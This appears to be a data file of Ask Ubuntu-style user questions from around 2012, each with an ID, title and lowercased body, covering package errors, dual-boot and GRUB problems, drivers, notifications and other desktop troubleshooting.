185070	why i get hostname : name or service not known error ?	i 'm getting this error when ever i install any packages via apt-get : hostname : name or service not known dpkg : error processing ssmtp ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up libt1-5 ( 5.1.2-3.4ubuntu1 ) ... setting up php5-gd ( 5.3.10-1ubuntu3.2 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : ssmtp e : sub-process /usr/bin/dpkg returned an error code ( 1 ) why this is happening ?
185071	vim can not layout properly with eliminator	i am using terminator as terminal emulator . terminator allows to increase/decrease font size and also modifies the $ columns and $ lines environment variables properly . less and nano seem to understand this change and display long files properly . but vi/vim does not seem to pick up this change and does not layout well ( it does not display from the first line of the file ) . please look at the picture below to see the problem : at the time of issue , the values of relevant environment variables are , $ echo $ lines 47 $ echo $ columns 198 insalled software : ii vim 2:7.3.429-2ubuntu2.1 vi improved - enhanced vi editor ii terminator 0.96-0ubuntu1 multiple gnome terminals in one window thanks
185073	where does wine install programs in the filesystem ?	i have recently installed ms office using wine . can someone tell me where are the files installed . i mean like in windows application are installed in program files folder by default , where are they installed in ubuntu 12.04 . while installing any software like photoshop can i decide in which folder should they be installed ?
185078	is it possible to temporarily disable notifications ?	i certainly like notifications in 12.04 , but depending on the work i do they can be quite distracting . is there an official way or a tweak to temporarily deactivate notifications ? update : to clearify , i am looking for a way to do that in unity .
185079	which version of ubuntu will work out of the box on intel 82845g board ?	i am new to linux . i have tried tried many linux distro but none of them work on motherboard with intel 82845g/gl graphics card . the only version that worked out of the box was ubuntu 8.04.4 lts . none of the latest release works on my dreaded pc . how can i install i810 driver in 12.04 ? ubuntu developers please support old computers . what should i do with this old pc ?
185081	re-installation of ubuntu	my system was running fine on 10.10 and upgraded to 12.04 it was extremely slow ( may be because of less hard disk or ram ) so i decided to go back to 9.04 as i had a bootable cd for that and when they ask for partition i agreed to use my whole hard disk as a file system without any partition and now that 9.04 is not running properly and every time the grub is coming up i am not even able to have a flash player even so could you please advice how can i make partition as i am not able to use gparted from 9.04 and then how to re-install windows 7 and format all other drives along with installed ubuntu 9.04 and delete all grubs and stuff and then after installing windows 7 properly i would like again re-install 10.10 . or if you guys have any other way for that please advice me on that but remember i want remove all the other grub stuff and start it from fresh . i also dont mind to have just ubuntu on my system . please any one can provide step by step procedure for that .
185085	how do i get artisteer running ?	some of you may know artisteer , it 's a web page designe windows tool , and there is no linux version of it . ( i want to use it to create joomla web pages ) does anyone use it with wine ? and how ? because i read a lot of comment in a lot of forums that said that wine does n't run it . if not , can you propose me a good tool to create joomla templates on ubuntu ? thank you !
185094	quanta touch does n't work	quanta multitouch screens worked as single input devices from 10.04 lts all the way up to ubuntu 11.10 . after that , they apparently use some multitouch architecture - but it both does n't work and breaks single input . most of the time , the event for letting go of the screen is never captured and this breaks a significant amount of the interface ( unity app blocks are dragged around instead of activated , nautilus refuses to acknowledge a click at all - only dragging around files , gtk app buttons are unresponsive etc ) . everything i 've read so far has pointed towards a fix being released , but i 'm on the latest and updated 12.04.1 and i 'm still having these issues . it 's a clean install with nothing else on it right now . i tried a bunch of things previously , including compiling a supposedly fixed patched 3.2.0.29 kernel but honestly , i 've forgotten most of what i tried and ended up formatting after exhausting my limits of google and patience . does anybody have any idea what to do from here ? i 'm using an acer t230h which is recognized by lsusb on 12.04 as hnurseries @ pos1 : ~ $ lsusb ... bus 002 device 003 : id 0408:3000 quanta computer , inc. optical dual-touch panel ... hnurseries @ pos1 : ~ $ xinput virtual core pointer id=2 [ master pointer ( 3 ) ] ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ↳ acer t230h id=9 [ slave pointer ( 2 ) ] ... and on 10.04 as hnurseries @ pos1 : ~ $ lsusb ... bus 002 device 003 : id 0408:3000 quanta computer , inc. ... hnurseries @ pos1 : ~ $ xinput virtual core pointer id=2 [ master pointer ( 3 ) ] ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ↳ acer t230h id=9 [ slave pointer ( 2 ) ] the only difference is the addition of `` optical dual-touch panel '' in lsusb . using mtdev-test sudo mtdev-test /dev/input/event4 it 's clear that the hardware is correctly sending a signal for each finger letting go of the screen ( -1 ) and can accurately track two fingers even when the first one is let go . i 'm more than willing to help debug these issues in any way with someone more qualified but we need to stay on the lts release if at all possible ( these screens are used in a retail environment , we 're trying to upgrade before 10.04 is eol ) . thanks in advance !
185101	too many images in one directory	i have a directory with half a million jpeg files and it ca n't be opened in nautilus . what is the simplest way to see the previews of these images ?
185109	ubuntu not starting	i have already burned ubuntu to the disk . but after restarting i am not getting the language selection screen or any other option to install or try ubuntu .
185110	what is the name of the program that displays the notifications ?	what is the name of the program that displays the notifications in ubuntu ? the ones like sound changes , song name ( in rhythmbox ) etc . can i send my own custom messages to it ? quick answer notify-send `` message title '' `` the message body is shown here '' -i /home/andrei/pictures/image.png -t 5000
185112	wireless is disabled by hardware switch on an hp pavilion 2000	wireless was working fine the last 6 months til yesterday . i get `` wireless disabled by hardware switch '' now in my menu . i am running hp pavilion 2000 laptop .
185113	purple screen , first time using ubuntu	it 's my first time using ubuntu and after my first reboot i loaded ubuntu and a purple screen appeared . i 've read it may have something to do with the graphics drivers . i have a nvidia gtx 560 and i do not know how to install the drivers from this purple screen , i can access recovery mode and i downloaded ubuntu using the windows installer .
185114	suddenly nothing appears on ubuntu except desktop background ; also super key , alt+tab has stopped working	this is my weirdest experience with ubuntu . i had upgraded from ubuntu 11.10 to 12.04 many weeks back . till y'day night everything was fine . when i started my pc today morning , weird things are happening : '' alt + tab '' is not working at all , it appears as of only `` tab '' is taken ; i am able to open terminal using `` ctrl + alt + tab '' ( shortcut ) though and move between workspaces using `` alt + tab + < arrow > '' '' super '' ( which has windows logo ) key is not working . typically when i press it , it displays '' start menu '' kind of stuff it does n't show anything on the screen except the background ; generally i used to see top bar where apps like skype , date/time , power setting etc . used to reside not able to see left side app bar , which displays several icons when mouse hovers on it or `` super '' key is pressed i restarted my laptop but no luck . presently i am going to terminal and opening everything using command line , e.g . `` google-chrome & '' and `` eclipse & '' , which is very annoying . i have n't touched any of my settings in several days or install any updates , except y'day i did `` sudo updatedb '' just to update the locate command . please someone help in this regard .
185115	cairo dock menus does n't work	i 'm trying to use gnome-shell with cairo dock in 12.04 , but there is one problem , i want to have some kind of menu in cairo dock . the thing is , non of the menus i tried work in cairo dock . i tried mintmenu , gnomenu , cardapio , all of them show up in cairo dock , but then i press them , nothing happens . it just killing me .
185116	ubuntu 12.04 install does n't detect windows 7 for dual boot	i 've used linux in the past and really want to install it on my current computer alongside my current os , win 7 64-bit . however , when i try ( various methods ) from the 12.04 livecd , it ca n't seem to detect my windows 7 installation ; worse than that when i try to opt for the advanced/custom option instead of `` erase entire drive and install ubuntu '' , it does n't detect my hard drive there . ubuntu knows the hard drive is there though , because i can open its partitions through the file explorer etc and they automount . gparted knows it 's there too , and sees the partitions correctly ( though it reports some sort of error with my windows partition , a couple bad sectors or something and says to run chkdsk /f from windows and reboot into it twice ) . the hard drive itself , in both windows and linux , shows the partitions as : 1 is pqservice ( i assume windows recovery ) , 1 is system reserved , 1 is c : /acer ( my main windows drive and install etc , and previously d : /data ; i killed/deleted this partition though after backing up all my data hoping it might make the installer work ; alas it does not . i want to install to this free space ( roughly 250gb ) , but ... i just do n't know how to . the installer is giving me no options ! i 've tried looking at other threads , but not had any luck with the information i 've found . would it by any chance be because i 'm possibly using a 32-bit ubuntu live image that it wouldn't/ca n't detect a 64-bit win 7 install ? i 'm going to try and get a 64-bit image for a livecd anyway , hoping it might work but ca n't try till i get home . if it really persists , i 'll just go back to mint which i used a few years back ( assuming it does n't have the same issue ) , but i kinda wanted to switch over to ubuntu . ( just to add the hdd is in mbr )
185117	software center not opening	i ca n't open the software center . is there anything i can do to get it to start ? $ software-center 2012-09-07 18:45:04,349 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 410 , '_introspect_error_handler ' ) ' 2012-09-07 18:45:04,349 - dbus.proxies - error - introspect error on :1.128 : /com/ubuntu/softwarecenter : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . 2012-09-07 18:45:29,406 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-09-07 18:45:29,409 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-09-07 18:45:29,822 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-09-07 18:45:29,973 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2012-09-07 18:45:29,991 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) killed
185118	command line mount helper for ubuntu server ?	under ubuntu there are several mount helpers to support easy mounting of encrypted ( cryptsetup/luks ) removable media such as usb drives . under gnome/unity/xfce a requester is opened , just enter the password , and everything is going well . is there something like that under ubuntu server when logged in on the command line ? pmount would be exactly what i am looking for , but does not support btrfs , and the maintainer has given up maintaining years ago . udisks does not support encrypted and gets confused by device-mapper paths . any method to mount it in a single step ? or the manual way with cryptsetup an mount ? how exactly does it work under gnome/unity/xfce ? where exactly , in which program would i have to look for the source files ?
185120	selecting windows in grub redirects to bootmgr	about a year ago i installed ubuntu 11.10 on my lenovo computer running windows 7 using wubi . i selected the os using bootmgr during startup and everything was fine and dandy . then , i attempted to upgrade to 12.04 . the upgrade failed for reasons not relevant to this question , and left me with a 'dead ' linux install . so today i decided to wipe the old and reinstall 12.04 from scratch . i removed wubi , and created a new partition on my disk . the install itself went ok , but the grub/bootmgr config is slightly messed up . when the machine is booting , it first presents me with the grub startup screen . if i select linux , the ubuntu installation starts up . however , if i select windows 7 , grub then sends me to the bootmgr o/s selection screen , which lets me choose either windows 7 or the old , dead ubuntu/wubi installation . win7 starts fine when selected from this menu . how can i fix the configuration so that grub starts windows directly without sending me to bootmgr ?
185127	how can i install cinelerra on kubuntu ?	hope s.o . can help me ... . according to a page i found i should do this : sudo add-apt-repository ppa : cinelerra-ppa/ppa sudo apt-get update sudo apt-get install cinelerra but that led to the problem that the package `` libmpeg3cine '' could not be installed because some files were already installed by package `` mpeg3-utils '' . the package system seemed broken because of a defective package . so i tried to uninstall it - which did not work . it worked only by running sudo gedit /var/lib/dpkg/status and removing the `` cinelerra '' section . then i tried to compile it according to the g-raffa compilation howto . but this did not work until `` make '' . then i got the following errors : collect2 : ld gab 1 als ende-status zur端ck make [ 3 ] : *** [ x264 ] fehler 1 make [ 3 ] : verlasse verzeichnis '/home/peterl/system/cinelerra-4.3/quicktime/thirdparty/x264.052906' make [ 2 ] : *** [ x86_64/x264 ] fehler 2 make [ 2 ] : verlasse verzeichnis '/home/peterl/system/cinelerra-4.3/quicktime' make [ 1 ] : *** [ all ] fehler 2 make [ 1 ] : verlasse verzeichnis '/home/peterl/system/cinelerra-4.3' make : *** [ all ] fehler 2 i even tried the newer version but that stopped earlier i think with the following error message : /usr/bin/ld : .libs/libmpeg3.o : relocation r_x86_64_32 against `.rodata.str1.1 ' can not be used when making a shared object ; recompile with -fpic .libs/libmpeg3.o : could not read symbols : bad value collect2 : ld returned 1 exit status make [ 3 ] : *** [ libmpeg3hv.la ] fehler 1 make [ 3 ] : verlasse verzeichnis '/home/peterl/system/cinelerra-cv-old/libmpeg3' make [ 2 ] : *** [ all-recursive ] fehler 1 make [ 2 ] : verlasse verzeichnis '/home/peterl/system/cinelerra-cv-old/libmpeg3' make [ 1 ] : *** [ all-recursive ] fehler 1 make [ 1 ] : verlasse verzeichnis '/home/peterl/system/cinelerra-cv-old' make : *** [ all ] fehler 2 as far as i know it says that i have to recompile with `` -fpic '' so i tried to `` configure '' with : ./configure -- with-buildinfo=git/recompile -- enable-mmx -- without-fpic -- without-pic but that seemed not to help as well . i also tried as mentioned with : ./configure -- with-buildinfo=git/recompile but that did not work as well . now i do not know what else i could try to get cinelerra running . maybe there is another howto ? hope someone can help me please .
185130	ati hybrid graphics over heat . intel gpu not working !	i just followed this guide ( http : //ubuntuforums.org/showthread.php ? t=1930450 ) and installed the proprietary ati drivers on my laptop which have ati hybrid graphics ( ati radeon hd 6770 m gpu ) . it worked and the gpu is working well . but it started to heatup . any way to fix this ? i switched to the intel gpu through the control panel and then , after entering the password in the login screen , nothing comes.. only the wallpaper . but unity 2d works . before trying the guide , i used only the intel gpu ( never installed the ati drivers ) and with that setup , unity 3d worked . ( but had some tiny lags . but its ok ) . why is it not working now ? how to fix this ? if i can fix the heating issue , i do n't need to try the intel gpu . ps : specially , the cpu temperature goes up while using the ati gpu . when using only the intel gpu , it did n't went up like this !
185132	what is the default pdf reader in 11.10 ?	recently i installed ubuntu oneiric ocelot 11.10 on my desktop . it has a built-in pdf reader which i accidentally uninstalled when i removed ghostscript with the following command : sudo apt-get remove ghostscript i have no clue what the name of the pdf reader was , and how to get it back on board . seems like a really easy question , but could n't figure it out with googling only .
185134	lightdm not responding to xdmcp requests 12.04 lts	since a recent upgrade from 10.04 lts to 12.04 lts i can no longer login using xdmcp ( ssh -xc is okay ) . this is similar to an earlier question but the answer ( add xserver-allow-tcp=true ) did n't help me . i have followed the instruction to setup lightdm as an xdmcp server as follows : /etc/lightdm/lightdm.conf [ seatdefaults ] user-session=ubuntu greeter-session=unity-greeter xserver-allow-tcp=true [ xdmcpserver ] enabled=true and then restarted by sudo restart lightdm i have the following in /var/log/lightdm.log [ +0.01s ] debug : waiting for ready signal from x server :0 [ +0.01s ] debug : starting xdmcp server on udp/ip port 177 [ +0.01s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.01s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +0.18s ] debug : got signal 10 from process 4925 [ +0.18s ] debug : got signal from x server :0 [ +0.18s ] debug : connecting to xserver :0 netstat -l | grep xdmcp gives udp 0 0 * : xdmcp * : * udp6 0 0 [ : : ] : xdmcp [ : : ] : * which seems okay ( although others had said there should be a tcp port 6000 here as well ) . the firewall port is open : sudo ufw status 177 allow anywhere 6000 allow anywhere 22 allow anywhere ( v6 ) 177 allow anywhere ( v6 ) but no go : xephyr :2 -query * [ dix ] could not init font path element /usr/share/fonts/x11/cyrillic , removing from list ! [ dix ] could not init font path element /usr/share/fonts/x11/100dpi/ : unscaled , removing from list ! [ dix ] could not init font path element /usr/share/fonts/x11/75dpi/ : unscaled , removing from list ! [ dix ] could not init font path element /usr/share/fonts/x11/100dpi , removing from list ! [ dix ] could not init font path element /usr/share/fonts/x11/75dpi , removing from list ! xdm : too many retransmissions , declaring session dead does anyone have any clues , or even how i can go about debugging this ? many thanks ! !
185137	battery status in panel does not change or give low battery warning ( ubuntu 12.04 )	i recently upgraded from 10.04 to 12.04 precise ( first point release ) on my laptop ( an msi machine ) . i 've resolved several minor issues but ca n't figure one out and have searched here and on google to no avail ( hope i did n't miss a post somewhere ) . here is the problem i am facing : the battery status icon in the panel : the icon does not change when the power cord is plugged in or unplugged ( the icon remains a battery if that was the power source on boot but wo n't change if i plug in the power adaptor and visa-verse ) . the battery indicator does not give me a low battery warning or alert ( ubuntu just shuts down with no onscreen warnings ) . under 10.04 , i did the the low battery warnings before shut down . the battery status is n't updated at all ( it does n't decline as the battery drains ) . while searching , i 've only found questions about the icon being completely missing and reporting the battery critically low when it is not but nothing like my issue . this came closest and may be related : http : //ubuntuforums.org/showthread.php ? t=1966671 ( i also have a blank in the dropdown but the icon is present in my panel - it just is n't fully functional ) . i did , however , notice that gconf-editor under `` apps , gnome-power-manager '' , there were no notification settings ( also using dconf-editor the icon policy is missing but is present under gconf-editor under `` ui '' ) . not sure if that matters or not , however . i am currently using gnome-classic but noticed the same icon issue in unity ( not sure if unity also has the no low battery warning problem , however ) . i have not enabled hibernation as i do n't use it but wonder if that has an influence or not . any ideas ? is the missing icon-policy the problem ? will it help if i enable hibernation ? is it a known bug and i just need to wait for the next update ?
185139	why does firefox try to use gedit to open .deb files	i am running firefox 15 on ubuntu 12.04 . if i go to a website with a .deb link , firefox downloads the file , then tries to open it with gedit . if i use nautilus to open the .deb file , it runs it in either gdebi or ubuntu software center ( i 've experimented with both ) . oddly , no matter what i 've done i ca n't seem to get firefox to believe that debs should not be opened by gedit . see below from my mimeapps.list . also , there are no references to my .deb files in /usr/share/applications/defaults.list
185142	is it possible to use 12.04 live cd to repartition hard drive ?	i have a dual boot system vista and ubuntu . i upgraded to 12.04 and ran out of hard drive partition space for ubuntu . i a willing to blow away the vista partition and the acer recovery partition to make more space for ubuntu since i never use the vista and do n't care about the recovery to vista . can i use the 12.04 live cd to repartition the hard drive and save my current 12.04 installation ?
185144	is it possible to monitor notifications ?	i would like to programmatically monitor the notifications that get displayed in ubuntu ( in order to perform different actions based on the content of the notifications ) . i do not see a feature that offers this sort of ability documented anywhere in notify-osd . can anyone recommend a method for accomplishing this ?
185145	do all my files , office , and outlook transition when i install ubuntu ?	when i install ubuntu , do i keep access to all my windows vista files ( word , excel , etc . ) and documents ( photos , etc . ) , and do i keep all my outlook data ( history , address list , etc ) ?
185153	mount.ntfs takes 90 % of cpu	i installed ubuntu 12.04 on my samsung nc10 laptop with 2 gb ram using wubi . when i try to install something or to do something with files , the mount.ntfs takes 90 % of cpu . also i have an issue that ubuntu uses all 2gb of ram ( 1gb immediately after start and usage increases ) . what can i do with this issue ?
185154	depends libntfs10 error while installing testdisk	i want to install testdisk to ubuntu 10.04 lts but i 'm getting an error . any help ? here is the output : # sudo apt-get install testdisk reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : testdisk : depends : libntfs10 ( > = 2.0.0 ) but it is not installable e : broken packages i also tried : wget http : //launchpadlibrarian.net/40386584/libntfs10_2.0.0-1ubuntu4_i386.deb ; sudo dpkg -i *.deb and i get this error : dpkg : error processing libntfs10_2.0.0-1ubuntu4_i386.deb ( -- install ) : package architecture ( i386 ) does not match system ( amd64 ) errors were encountered while processing : libntfs10_2.0.0-1ubuntu4_i386.deb
185160	how did all the passwords get in my login keyring ?	in my passwords and keys application ( seahorse ) i have a `` login '' keyring . within that are a many keys . how did they get there ? what application put them there ? i use chrome with lastpass extension , would that do it ?
185161	how to automatically delete a file at a specific time after closing it ?	i am using ubuntu 12.04 and i am here to know : is there any way to limit the life time of a file ? i mean , for example , i have created a file that has to be automatically deleted 10 minutes after i close it . is there any way to do it ?
185162	how to change goldendict system tray icon ?	i 'm trying to change goldendict system tray icon , and ca n't find one in system files . i managed however to change launcher icon : it 's located in /usr/share/pixmaps/dictionary-icon.png , but system tray icon stayed the same . any suggestions on where to find that one ? i 'm using ubuntu 12.04 lts with default unity desktop and goldendict version 1.0.1 .
185165	wubi install leads to black screen after reboot	i did a wubi `` alongside install '' from the windows installer for ubuntu desktop 12.04 lts . after install i get a black screen , when trying to boot ubuntu . just a black screen ; no purple splash screen and it is only limited to ubuntu ; windows 7 runs as it always has . i have intel hd graphics family listed for display adapters . edit : i uninstalled and tried from an image disk and experience the same issue . edit 2 : tried this on the off chance it would work . i was able to use it in `` try mode '' but after install it again went black ( intall with updates using the disk through a newly dowloaded wubi installer that it directed me to ) . the screen went black again after install ( this time with the purple splash screen was visable ) hitting the shift at boot did nothing . there was an error , but it did n't display long enough for me to catch the message . edit 3 : apparently this is an conflict with the os and the intel graphics series , as it is not limited to ubuntu and happens with every distro i have tried ( which is all of them with the same exact problem ) . where does one report bugs ?
185167	syncing between computers / batch download	i have synced files from two different devices . now i want to copy to contents of the synced files to the other device . using the web interface , it seems only possible to download one file at a time . is there a way to setup automatic sync or to download all the files in a folder with one step ? thanks in advance for your time . i was using the web interface to ubuntu , but an answer for ubuntu one would also be ok. edit : i was trying to copy the files automatically between devices . i found a checkbox on ubuntu one that says sync locally that seems to work . but from the web interface is it possible to do a download of multiple files in a folder at one time ?
185168	glibcxx_3.4.4 not found	i installed libstdc following this webpage information . and with the program i 'm trying to run i received this error . talos+ : /usr/lib/libstdc++.so.6 : version 'glibcxx_3.4.4 ' not found ( required by talos+ ) i tried this glibcxx_3.4.15 not found but it did n't fix the problem . thanks for the help ! libstdc++6 32bit version must be used for talos+ i used a ubuntu 32 bit machine to copy the /usr/lib/libstdc++.so.6 and uploaded it here . http : //www.mediafire.com/ ? j0133qqwiilsuz1
185171	ubuntu 12.04 external hd issues	i am experiencing one more problem with my ubuntu 12.04 ... i have an external hd ( 500gb ) which is ntfs formatted . i connected this hd on my ubuntu 12.04 and copied some files . when i connected the hd on a windows 7 machine i could find the folders ( the were visible ) but i was n't able to copy/cut/delete them . however when i opened the folders i could handle the material ( mp3s ) in them . does anybody know how can i fix this ? how can i fully access and modify folders copied from ubuntu via a windows machine ? thanks in advance !
185172	before installing wubi , should i defragment the disk ?	is it might help ? is there something else that whould make it better ?
185181	how do i install ubuntu with lilo ?	have previous version installed with lilo . current options are win7 , xp and ubuntu . previous upgrades have resulted in error messages . i wish to have a clean installation of ubuntu 12.04 lts . how do proceed without damaging windows ?
185183	ca n't get to the installation screen , keeps rebooting	i 'm trying to install 12.04.1 and after i choose install or live , it just goes to a blinking cursor or some text , then reboots the machine . i 've tried nomodeset , alternate install , dvd install , and usb . same problem with all of them . i 've also tried unplugging unnecessary devices such as my webcam and 2nd monitor . specification : gigabyte mobo amd phenom ii 965 @ 3.7ghz 4gb ddr2 1066 amd radeon hd 6870 creative sound blaster x-fi xtreme gamer
185188	how can the application that makes an indicator icon be identified ?	it used to be possible to identify the application that was responsible for an indicator icon by right-clicking it and selecting the about option in ubuntu 10.04 . how is the application identification for an indicator icon done now in 12.04 ? see this answer in how does one find out which application is associated with an indicator icon ?
185189	removing ac power when laptop lid is closed does n't suspend	while the laptop lid is closed , when i remove external power , the laptop does not suspend so i have to open the lid and close to make it suspend . when the laptop lid is open , then i remove power , then close , it works fine . this used to work in ubuntu 11.04.. did n't work after upgrading to 11.10 and still not working now that i 'm on 12.04
185191	indicator applet in mate	i hate gnome3 , so i installed mate ( gnome2 fork ) in my ubuntu 12.04 desktop . it 's pretty good , but i have a problem : it doesnât have ( or i have n't found ) a working indicator applet on the top panel . i installed mate-indicator-applet package , but it displays only a message icon , but i need volume-control with rythmbox panel , ubuntu1 and a system menu ( logoff , shutdown , hibernate , etc . ) so is it possible to set the indicator applet like the normal gnome ? this is what i have : and this what i want to have :
185193	how do i download the terminal application for ubuntu 12.04 in lubuntu 12.04 ?	i recently installed lubuntu . the terminal look and feel are not as good as compared to l & f for terminal that i used use in ubuntu 12.04 . i would like to know from where and how can i download the same terminal that i was using ubuntu 12.04 .
185198	how to uninstall a software that has been installed using wine ?	i have installed ms office 7 using wine , i need to install office 10. can someone tell me how can i uninstall office 7 ?
185208	mouse freezes randomly	i can run for many days without any issues , but then , like today , my logitech usb mouse will freeze in motion every 60-90 seconds . how can i fix this issue ?
185209	grub error while installing windows	i have changed my hd with a new one ( the old one was dead ) . when i try to install windows 7 from dvd it wo n't boot , even if dvd is the 1st boot device in bios . i always get the error message : grub error no such partition update : i had an hd in my laptop , i romve it and i put a new one clean on it and a have this grub error any help ?
185210	system network broken , due to wrong installed driver	in my search for fixing the issue i posted here , how to set wifi driver settings to prefer 5 ghz channel above 2.4 ghz , i thought that it might be a good idea to update the drivers . i have a `` intel 82567lm gigabit network connection '' and `` intel wifi link 5100 agn '' i went to search for linux drivers . i then found this driver , http : //downloadcenter.intel.com/detail_desc.aspx ? agr=y & dwnldid=15817 & lang=eng & osversion=linux* & downloadtype=drivers . i installed it . now after a reboot i find out my network connection is broken and can not get access to internet anymore . it seems the driver is incompatible : ( now is it possible to fix this issue ? or might it better just to reinstall ubuntu ? relevant images :
185217	laptop wo n't boot after failed hibernation and power cycle	i have ubuntu 12.04 by installed on my inspiron n5030 . its my only operating system . recently , ubuntu had a problem with resuming from hibernation . this has happened before , and i simply held the power button until the system shut down and restarted without a problem . now i did the same thing once again , except this time , my system wont boot . could i have damaged ubuntu by shutting my computer off manually ? is there anything i can do to fix it ? i 'd really rather not lose all my data .
185219	installing purchased apps in ubuntu 12.10	i just installed 12.10 on my new hdd , because i did n't want to have to upgrade in a month 's time , and i ca n't install my purchased apps , because they are 'incompatible ' with my system . is there any way around it ?
185226	does ubuntu support the thumb-shift keyboard for japanese ?	this is what i 'm referring to . can i use such a keyboard design [ ubuntu 12.04.1 ] ?
185228	booting ubuntu from a pen drive i get a purple screen	i 've followed the instructions from this site to install ubuntu from a pen drive onto a new build pc . i get the option to choose either the test run or to install , i choose install option then i get half a screen of purple and a loads of binary dots ... ... . my system specs : p8z77 ph board 1.5 tb hdd in raid 128 gb ssd i5 3650k cpu geforce gtx 620 gpu 16 gb hyper x kingston 1600 ram just to add to this , i created the file from a windows based laptop ... ... but i didnt install a windows version of the linux install ... . i just downloaded it straight
185230	where must i click in printing settings to pull up server settings ?	i am trying to publish a network printer . i have tried right clicking everywhere but it does not offer the server option . i remember from a year ago having to do this and i found it then but this is a new 12.04 install and i just can not find it . is there a command line option ?
185233	why do we need to use the recursive option to remove or copy folders	why does ubuntu , and any other unix system for that matter what you to use `` remove recursively '' for folders or copy recursively . i can only imagine it 's a security thing but the name recursive does n't imply such a thing .
185235	pastie is broken for ubuntu 11.04	i had pastie working for the longest time on ubuntu 11.04 , working great , i love the little bugger : ) i still have it working on my laptop ( same system ) . recently i ran upgrade on all packages in my ubuntu 11 system . now pastie does n't work , this is the error i get : traceback ( most recent call last ) : file `` /usr/bin/pastie '' , line 96 , in < module > clipboard_protector = protector.clipboardprotector ( ) file `` /usr/lib/pymodules/python2.7/pastielib/protector.py '' , line 72 , in __init__ self.history.set_payload ( self.recover_history ( ) ) file `` /usr/lib/pymodules/python2.7/pastielib/protector.py '' , line 138 , in recover_history history_tree = tree.parse ( input_file ) file `` /usr/lib/python2.7/xml/etree/elementtree.py '' , line 1177 , in parse tree.parse ( source , parser ) file `` /usr/lib/python2.7/xml/etree/elementtree.py '' , line 653 , in parse parser.feed ( data ) file `` /usr/lib/python2.7/xml/etree/elementtree.py '' , line 1624 , in feed self._raiseerror ( v ) file `` /usr/lib/python2.7/xml/etree/elementtree.py '' , line 1488 , in _raiseerror raise err xml.etree.elementtree.parseerror : not well-formed ( invalid token ) : line 2 , column 380 anyone know what to do to get this thing to work again or what the heck all those error 's mean ? i 'm not a python guy . i tried apt-get purge pastie and re-install but no go .
185240	why i ca n't open folders copied from ubuntu on windows ?	is not possible for me to open whatever folder i copy from ubuntu to my windows partition or whatever usb memory . windows says the folder 's ( folder inside usb memory , wich i can see on win ) location is either disconnected or does n't exist . ca n't copy , cut or delete the folder on windows but with ubuntu i can . this happens even if i create the folder on the ntfs disc . i have never had this problem before . files are openable however , but not if they are inside a folder . sorry if i have n't expressed myself , but this is basically the problem : i have always copied folders containing all filetypes ( video , music , etc ) to flash drives , external disc drives , ntfs partitions , and i have opened and viewed them on windows with no problems . now i ca n't . sorry for inconvenience .
185246	how can i restore default fonts in ubuntu 11.10 ?	i have accidentally deleted some of the fonts from /usr/share/fonts folder . they must have been crucial since now i have various display problems ( underscore and font size display ) . i have already tried resetting gnome and system fonts settings but it does not solve the problem . it seems that i need the missing fonts files but i do n't remember the names . do you know where i can find a list of preinstalled fonts of ubuntu 11.10 , so that i can locate and restore the missing files ?
185247	how to determine what applications affect xorg/compiz load	is there a way to tell which application causes huge cpu usage and huge load for xorg and compiz processes ?
185248	how can i make a keyboard shortcut key to show the launcher when hidden ?	i have the launcher hidden , i want to make a short cut key to show the launcher ( pop it out ) . i want to make that key the fn key . 1.how do i make that specific short cut key ? 2.how can i make shot cut keys for different commands ? e.g . show dash , etc .
185249	by default does rdesktop use any encryption ?	when you use rdesktop to remote into another computer , is it traveling over the internet unencrypted ? how secure is rdesktop , or should another application be used ? thanks
185257	ca n't click with usb mouse	i have a dell inspiron mini 910 . the mouse clicks or touchpad clicks work fine in 12.04 os shell but not in the apps , but sometimes it does work . installation of 12.04 was weird when some clicks worked like the map for the time zone but the partition mapping did n't work and i can access much of it using tab and arrow keys . i 've tried turning off touchpad clicks etc . what 's weird is that the mouse and the touchpad both fail to work in apps . i can click launch firefox from the side list but i ca n't click a web link with either the mouse or the touchpad . any assistance would be appreciated .
185263	i dont ' know how to install ?	i 've downloaded the usb version from the web site , and the usb installer , then i run it and it finished , but then nothing happens , i tried to go to iso and run the setup then it finished and restarted the computer with windows , iv'e tried to restart it again and choose ubuntu but it launches a black screen with some texts and nothing happens , please help me i 'm very new to ubuntu and i need to download it because my windows is pretty awful !
185267	impossible to enable bluetooth on an acer aspire one 756-877	i just installed 12.04 ( dual-boot , kept windows just in case ) on my new acer aspire one 756-877 . as soon as i installed it , i also installed the broadcom driver , since wi-fi was n't working , and that solved it right away . but when i tried bluetooth , i had a problem that i see is quite recurring : the hardware is on ( and working fine under windows ) the icon shows up on the menu , giving me the options of turning bluetooth on or off , and then just `` bluetooth preferences '' . i can apparently turn it on that way , which only lights up the icon but makes no difference at all ( and does n't give any other options in the bluetooth menu ) when i open `` bluetooth preferences '' ( whether bluetooth is apparently on or off , it makes no difference ) , it says it 's disabled and will not let me slide the button to enable it . i 've rebooted , but nothing happens . the material is broadcom and the port ( if it 's relevant at all ) is port_ # 0001.hub_ # 0003 i tried the following commands suggested in other similar questions , with no result at all : sudo dmesg | grep blue sudo service bluetooth start sudo /etc/init.d/bluetooth start any other clues on what i can do ?
